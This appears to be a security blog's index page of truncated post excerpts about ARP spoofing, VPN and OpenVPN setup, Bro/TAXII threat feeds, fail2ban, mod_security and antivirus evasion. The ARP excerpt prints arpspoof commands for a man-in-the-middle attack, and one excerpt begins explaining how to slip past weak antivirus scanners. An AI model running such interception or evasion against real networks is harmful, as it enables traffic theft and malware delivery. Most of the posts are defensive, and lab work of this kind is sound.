Attacker: 172.16.1.10 Victim: 172.16.1.20 Router: 172.16.1.1 Arpspoof method: First enable forwarding on the attacking system. echo ‘1’ > /proc/sys/net/ipv4/ip_forward Poison the ARP table of the router to tell it that you are the victim. arpspoof -i eth0 172.16.1.20 172.16.1.1 Poison the ARP table of the victim to tell it that Read more…
Here’s how to configure a pfSense firewall to be a VPN client so IPv4 traffic always traverses the VPN. Build a VM at a cloud provider and configure it as an OpenVPN server. Using a self signed CA, cert, and TLS auth. For pfSense, take the following steps. Cat your Read more…
Here’s how to configure an RPI so that it auto connects to a VPN on boot via PoE. One could connect to it via WiFi and surf over the VPN, and no one will ever know. EVAR! This is for educational purposes only. I’m not responsible for your actions. Get Read more…
Through my research I came across several scripts and howtos on chrooting, or running openvpn as nobody. They all had issues for me on Arch. Below is a very simple way to run openvpn as a normal non-root user. I have found that this is the most secure method of Read more…
1. Install prereqs on Debian 8.6 apt-get install libxml2-dev libxslt1-dev python-dev zlib1g-dev python-pycurl python-pip 2. Install libtaxii pip install libtaxii 3. Cron this script to pull different TAXII feeds from hailataxii.com, and convert them into lists that bro can put into the Intel Framework. #!/bin/sh ## TAXII feed script ## Read more…
Lots of new features https://www.bro.org/documentation/beta/NEWS.bro.html Installed a test instance on FreeBSD 10.3. pkg install wget swig mkdir /opt wget https://www.bro.org/downloads/beta/bro-2.5-beta.tar.gz tar zxvf bro-2.5-beta.tar.gz ./configure –prefix=/opt/bro && make && make install Get some coffee. I edited /opt/bro/share/bro/site/local.bro and uncommented VLAN logging, Mac logging, and SMB analyzer for testing. I also edited /opt/bro/etc/node.cfg Read more…
It is so easy to stop SSH brute force attacks. I implemented fail2ban on my test box in literally 5 minutes. I configured it so that 6 bad password attempts to SSH will block a user for 600 seconds. That will really throw off most attackers and automated scanners. 1. Read more…
Apache mod_security can be configured to block OWASP top 10 attacks. Scan me and see. Single server (Debian 8): Install Packages. apt-get install libapache2-mod-security2 service apache2 restart cd /etc/modsecurity/ mv modsecurity.conf-recommended modsecurity.conf Edit modsecurity.conf and enable it “SecRuleEngine On” “SecRequestBodyAccess Off” Grab OWASP Top 10 Rules: git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git /opt/OWASP Read more…
First, I have to say that I don’t condone running any of this and to use at your own risk. This is ONLY for research purposes and learning from attackers. So if you wanna act like Mr. Robot and disguise yourself as a janitor to go into some business to Read more…
Here’s an example of how bad some AV providers are. They’re just flagging on a string in the file, or an md5 hash of the .idata section. The method below wont defeat the decent AV, but all the crap ones like SCEP, ClamAV etc. About half of them in virus Read more…